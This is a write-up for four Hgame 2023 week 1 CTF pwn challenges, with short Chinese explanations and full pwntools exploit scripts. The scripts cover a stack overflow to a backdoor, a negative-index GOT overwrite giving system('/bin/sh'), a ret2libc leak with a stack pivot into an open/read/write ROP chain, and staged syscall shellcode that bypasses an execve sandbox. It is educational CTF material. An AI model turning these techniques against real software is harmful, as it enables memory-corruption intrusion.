2023 Hgame week1 Write Up

PWN By Comentropy

easy_overflow

题目给了后门，但是关闭了标准输出流，所以需要 `exec 1>&0`，将标准输出流转到屏幕上。

exp:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# easy_overflow: stack overflow into a backdoor function. The binary closes
# stdout, so the shell has to re-point fd 1 before any output is visible.
# Helpers (ELF, process, remote, init, init_context, ggdb, lg_update, s, sl,
# sh, p64, sleep) come from the author's private ckyan wrapper around pwntools;
# their exact semantics are not visible here.
from ckyan.pwn.my_script import *
# from ckyan.pwn.my_libcsearch import *

local = 1  # 1: run ./vuln locally; 0: connect to ip/port below
debug = 1  # 1: attach gdb (when local) and enable the wrapper's debug context

binary = "./vuln"
elf = ELF(binary)

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    # NOTE(review): remote target fields are left blank in this template;
    # port is a str here — confirm the wrapper's remote() accepts that.
    ip = ""
    port = ""
    p = remote(ip, port)
    lib = ""

init(lib, binary, p)
context = init_context(debug)

if lib != "":
    libc = ELF(lib)

if debug and local:
    ggdb()

# name(obj): reverse-lookup the first global bound to exactly this object
# (identity, not equality); raises IndexError if nothing matches. Globals that
# share one object (e.g. local and debug, both 1, which CPython interns) are
# ambiguous — only use it on values that are unique, like a leaked address.
name = lambda obj : [name for name in globals() if globals()[name] is obj][0]
# lg(buf): log `buf` under its global variable name via the wrapper.
lg   = lambda buf : lg_update(name(buf), buf)


shell_addr = 0x401176  # the backdoor function in ./vuln (per the write-up)
pad = b'a' * (0x10 + 8)  # reach the saved return address: 0x10-byte buffer + 8-byte saved rbp, presumably
pad += p64(0x40118C)  # extra return slot before the backdoor; presumably a `ret` for 16-byte stack alignment — confirm in the binary
pad += p64(shell_addr)

# raw_input()

s(pad)
sleep(0.5)
# stdout was closed by the binary: duplicate fd 0 (still connected) onto fd 1
# so the shell's output becomes visible.
sl("exec 1>&0")
sh()

choose_the_seat

题目打 bss 段，只做了大于的限制，用负数可以打前面的 got 表。因为无法控制 rip，但好在 vuln 最后一步是执行 exit 退出而不是 return，所以第一步打 exit 的 got 表为 main 函数，这样程序会永远循环；然后打 puts 的 got 表泄露 libc 基地址；最后打 puts 的 got 表为 system，因为 vuln 会执行 puts，所以直接往参数里传入 /bin/sh\x00 即可。

exp:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# choose_the_seat: the seat index is only checked against an upper bound, so a
# negative index lets the "name" write land in the GOT below the bss array
# (per the write-up). rip is never controlled directly; rewriting GOT entries
# makes the program's own exit()/puts() calls do the work. Helpers (ELF,
# process, remote, init, init_context, ggdb, lg_update, ru, sl, s, r7f, sh,
# p64) come from the author's private ckyan wrapper; their exact semantics are
# not visible here.
from ckyan.pwn.my_script import *
# from ckyan.pwn.my_libcsearch import *

local = 1  # 1: run ./vuln locally; 0: connect to ip/port below
debug = 1  # 1: attach gdb (when local) and enable the wrapper's debug context

binary = "./vuln"
elf = ELF(binary)

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    # NOTE(review): remote target fields are left blank in this template;
    # port is a str here — confirm the wrapper's remote() accepts that.
    ip = ""
    port = ""
    p = remote(ip, port)
    lib = ""

init(lib, binary, p)
context = init_context(debug)

if lib != "":
    libc = ELF(lib)

if debug and local:
    ggdb()

# name(obj): reverse-lookup the first global bound to exactly this object
# (identity, not equality); raises IndexError if nothing matches. Only
# reliable for values that are unique objects, like a leaked address.
name = lambda obj : [name for name in globals() if globals()[name] is obj][0]
# lg(buf): log `buf` under its global variable name via the wrapper.
lg   = lambda buf : lg_update(name(buf), buf)

main = 0x4012D1  # address of main in ./vuln

# Step 1: index -6 is taken to be exit's GOT slot (per the write-up). Writing
# main there turns vuln's final exit() into a jump back to main, so the
# program loops instead of terminating.
ru(b'choose one.\n')
sl('-6')
ru(b'please input your name\n')
pad1 = p64(main)
s(pad1)

# Step 2: leak libc. Index -9 appears to be the 8-byte slot right before
# puts's GOT entry; filling it with non-NUL bytes lets the following
# puts(name) print through into the adjacent GOT pointer — inferred from the
# payload layout, confirm against the binary.
ru(b'choose one.\n')
sl('-9')
ru(b'please input your name\n')
pad2 = b'a' * 8
s(pad2)

# r7f() presumably reads the leaked 0x7f...-prefixed pointer (wrapper helper).
libc_base = r7f() - libc.sym['puts']
# NOTE(review): libc is only bound when lib != ""; the remote branch leaves
# lib empty, so this line raises NameError until a remote libc is supplied.
# lg('libc_base') presumably also rebases libc's symbols in the wrapper;
# otherwise libc.sym['system'] below would be an unrebased offset — confirm.
lg(libc_base)

# Step 3: same slot again. The name is now "/bin/sh\0" and the 8 bytes after
# it overwrite puts's GOT entry with system (per the write-up), so vuln's
# next puts(name) becomes system("/bin/sh").
ru(b'choose one.\n')
sl('-9')
ru(b'please input your name\n')
pad3 = b'/bin/sh\x00'
pad3 += p64(libc.sym['system'])
s(pad3)

sh()

orw

简单的 orw，程序开了沙盒禁用了 execve，泄露 libc 然后 orw 即可。但问题是 vuln 里只能溢出控制 0x28 个字节，无法给 orw 参数赋值，所以需要迁移一下，即在 orw 之前加上一个 read，往一个可读可写的地方布置栈帧；还有就是 orw 的 flag 路径，我是往另一个可读可写地址写入 ./flag 字符串，然后 orw 即可。

exp:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# orw: ret2libc leak, then a stack pivot into a writable bss address because
# the overflow in vuln is too short to hold an open/read/write chain directly
# (per the write-up). The sandbox blocks execve, hence orw instead of
# system(). Helpers (ELF, process, remote, init, init_context, ggdb, lg_update,
# ru, s, r7f, gadget, sh, p64) come from the author's private ckyan wrapper;
# their exact semantics are not visible here.
from ckyan.pwn.my_script import *
# from ckyan.pwn.my_libcsearch import *

local = 1  # 1: run ./vuln locally; 0: connect to ip/port below
debug = 1  # 1: attach gdb (when local) and enable the wrapper's debug context

binary = "./vuln"
elf = ELF(binary)

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    # NOTE(review): remote target fields are left blank in this template;
    # port is a str here — confirm the wrapper's remote() accepts that.
    ip = ""
    port = ""
    p = remote(ip, port)
    lib = ""

init(lib, binary, p)
context = init_context(debug)

if lib != "":
    libc = ELF(lib)

if debug and local:
    ggdb()

# name(obj): reverse-lookup the first global bound to exactly this object
# (identity, not equality); raises IndexError if nothing matches. Only
# reliable for values that are unique objects, like a leaked address.
name = lambda obj : [name for name in globals() if globals()[name] is obj][0]
# lg(buf): log `buf` under its global variable name via the wrapper.
lg   = lambda buf : lg_update(name(buf), buf)

padding = 0x100 + 8  # distance to the saved return address: 0x100 buffer + 8-byte saved rbp, presumably
pop_rdi_ret = 0x401393  # `pop rdi; ret` gadget in ./vuln
ret = 0x40101a  # `ret` gadget; defined but not used below
main = 0x40130C  # address of main, used to re-enter vuln after the leak

# Stage 1: puts(puts@got) leaks a libc pointer, then return to main.
pad1 = b'a' * padding
pad1 += p64(pop_rdi_ret)
pad1 += p64(elf.got['puts'])
pad1 += p64(elf.plt['puts'])
pad1 += p64(main)

ru(b'this task.\n')
s(pad1)

# r7f() presumably reads the leaked 0x7f...-prefixed pointer (wrapper helper).
libc_base = r7f() - libc.sym['puts']
# NOTE(review): libc is only bound when lib != ""; the remote branch leaves
# lib empty, so this line raises NameError until a remote libc is supplied.
# lg('libc_base') presumably also rebases libc's symbols in the wrapper;
# otherwise the libc.sym[...] values used in the chains below would be
# unrebased offsets — confirm.
lg(libc_base)

# Stage 2: stack pivot. Saved rbp becomes 0x404048 (a writable bss address),
# read() fills a fake frame there, and `leave; ret` moves rsp onto it.
# No rdx gadget here: the author notes the preceding read left rdx = 0x130,
# and there is not enough room for one anyway. rdi is assumed to still be 0
# (stdin) from that read — confirm.
pad2 = b'b' * (padding-8)
pad2 += p64(0x404048) # rbp
pad2 += p64(gadget('pop rsi;ret'))  # gadget() presumably searches for the pattern (wrapper helper)
pad2 += p64(0x404048)
pad2 += p64(libc.sym['read'])
pad2 += p64(0x4012EE) # leave ret

ru(b'this task.\n')
s(pad2)

# Stage 3: the fake frame that read() places at 0x404048. Its first 8 bytes
# are consumed by `leave` (pop rbp), so the chain proper starts at 0x404050.
# First call: read(0, 0x404038, <rdx left over>) pulls in the "./flag" path.
pad3 = b'a' * 8
pad3 += p64(gadget('pop rsi;ret'))
pad3 += p64(0x404038)
pad3 += p64(libc.sym['read'])

# open(0x404038 -> "./flag", 0 = O_RDONLY)
pad3 += p64(pop_rdi_ret)
pad3 += p64(0x404038)
pad3 += p64(gadget('pop rsi;ret'))
pad3 += p64(0)
pad3 += p64(libc.sym['open'])

# read(3, 0x404048, 0x30): assumes open() returned fd 3, i.e. only
# stdin/stdout/stderr were open. 0x404048..0x404078 is the already-executed
# head of this frame, so overwriting it with flag bytes is harmless.
pad3 += p64(pop_rdi_ret)
pad3 += p64(3) # fd
pad3 += p64(gadget('pop rsi;ret'))
pad3 += p64(0x404048)
pad3 += p64(gadget('pop rdx;ret'))
pad3 += p64(0x30)
pad3 += p64(libc.sym['read'])

# write(1, 0x404048, 0x30): print the flag bytes to stdout.
pad3 += p64(pop_rdi_ret)
pad3 += p64(1)
pad3 += p64(gadget('pop rsi;ret'))
pad3 += p64(0x404048)
pad3 += p64(gadget('pop rdx;ret'))
pad3 += p64(0x30)
pad3 += p64(libc.sym['write'])

s(pad3)

# raw_input()

# Path string for the pending read at 0x404038. No NUL terminator is sent, so
# this relies on the bytes after 0x404038+6 already being zero; it also
# relies on this send not being coalesced into the previous read — confirm
# (the other scripts use a sleep() to separate sends).
s(b'./flag')

sh()

simple_shellcode

题目虽然保护全开，但是会有一个执行写入的操作，有 0x10 个字节，所以需要靠这 0x10 个字节来实现对 mmap 出来的地址的写入，即手动写一个 shellcode，执行 read 写入 mmap 出来的地址；之后因为沙盒禁止 execve，所以用自己读入的 shellcode 执行 orw 即可。

exp:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# simple_shellcode: the binary executes 0x10 bytes of user input inside an
# mmap'd region (per the write-up). Those bytes only issue a read() to pull a
# longer second stage into the same region; the second stage does
# open/read/write because the sandbox blocks execve. Helpers (ELF, process,
# remote, init, init_context, ggdb, lg_update, ru, s, sh, asm, sleep) come
# from the author's private ckyan wrapper around pwntools; their exact
# semantics are not visible here.
from ckyan.pwn.my_script import *
# from ckyan.pwn.my_libcsearch import *

local = 1  # 1: run ./vuln locally; 0: connect to ip/port below
debug = 1  # 1: attach gdb (when local) and enable the wrapper's debug context

binary = "./vuln"
elf = ELF(binary)

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    # NOTE(review): remote target fields are left blank in this template;
    # port is a str here — confirm the wrapper's remote() accepts that.
    ip = ""
    port = ""
    p = remote(ip, port)
    lib = ""

init(lib, binary, p)
context = init_context(debug)

if lib != "":
    libc = ELF(lib)

if debug and local:
    ggdb()

# name(obj): reverse-lookup the first global bound to exactly this object
# (identity, not equality); raises IndexError if nothing matches. Only
# reliable for values that are unique objects, like a leaked address.
name = lambda obj : [name for name in globals() if globals()[name] is obj][0]
# lg(buf): log `buf` under its global variable name via the wrapper.
lg   = lambda buf : lg_update(name(buf), buf)

# Stage 1 (15 bytes): read(0, rdx, 0x100). The explicit `mov rax,0` was
# dropped to fit the 0x10-byte limit, so rax is assumed to already be 0
# (SYS_read) when control arrives — confirm in the binary.
# pad1 = asm('mov rax,0')
pad1 = asm('xor rdi,rdi')  # rdi = 0: stdin
pad1 += asm('mov rsi,rdx')  # rsi = rdx: rdx is assumed to hold the mmap'd buffer address at this point — confirm
pad1 += asm('mov rdx,0x100')  # rdx = count for the second-stage read
pad1 += asm('syscall')

print(len(pad1)) # 15 bytes, within the 0x10-byte limit

# raw_input()

ru(b'Please input your shellcode:\n')
s(pad1)

# Stage 2: with a larger read available, plain open/read/write of "flag".
# `push 0x67616c66` is "flag" little-endian, sign-extended to 8 bytes (top
# bytes zero), which doubles as the NUL-terminated path on the stack; each
# syscall number is loaded via push/pop; the write() count reuses the
# rdx = 0x100 left by the read().
shellcode = asm('''
    push 0x67616c66
    mov rdi,rsp
    xor esi,esi
    push 2
    pop rax
    syscall
    mov rdi,rax
    mov rsi,rsp
    mov edx,0x100
    xor eax,eax
    syscall
    mov edi,1
    mov rsi,rsp
    push 1
    pop rax
    syscall
    ''')

# The 0xf filler covers the already-executed stage-1 bytes, so the second
# stage lands exactly where execution resumes after the stage-1 syscall —
# inferred from the layout (stage-1 reads into its own buffer), confirm.
pad2 = b'a' * 0xf
pad2 += shellcode
sleep(1)  # let stage 1 run before sending, so its read() gets this payload

print(len(pad2))

# raw_input()

s(pad2)

sh()
updated 2023-04-17